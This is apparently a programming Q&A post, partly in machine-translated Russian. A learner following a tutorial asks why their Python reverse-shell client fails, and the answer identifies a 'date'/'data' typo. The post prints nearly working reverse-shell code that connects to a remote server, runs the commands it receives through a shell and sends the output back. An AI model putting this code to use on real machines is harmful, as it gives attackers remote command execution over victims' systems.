socket client issue '__getitem__'
Hi there I was watching some tutorials about a Revers shell using python in youtube https://www.youtube.com/watch?v=-QMPYah8fWI&index=5&list=PL6gx4Cwl9DGCbpkBEMiCaiu_3OL-_Bz_8][1]
the purpose of this client is to receive command from the server, the server works great but when I ran the client it gave me this
File "/root/Desktop/Revers/client.py", line 15, in <module>
if data[:2].decode('utf-8') == "cd":
TypeError: 'module' object has no attribute '__getitem_
вот код:
s = socket.socket()
s.connect((host, port))
while True:
date = s.recv(1024)
if data[:2].decode('utf-8') == "cd":
os.chdir(data[3:].decode("utf-8"))
if len(data) > 0:
cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
output_bytes = cmd.stdout.read() + cmd.stderr.read()
output_str = str(output_bytes)
s.send(str.encode(output_str + str(os.getcwd()) + '> '))
print(output_str)
s.close()
1 ответ
Решение
В этой строке есть опечатка:
date = s.recv(1024)
date
вместо data
,
Итак, выражение data[:2]
звонки data.__getitem__
где data
определяется раньше.
Как ошибка об 'module' object
, Похоже data
это модуль, который вы импортируете раньше.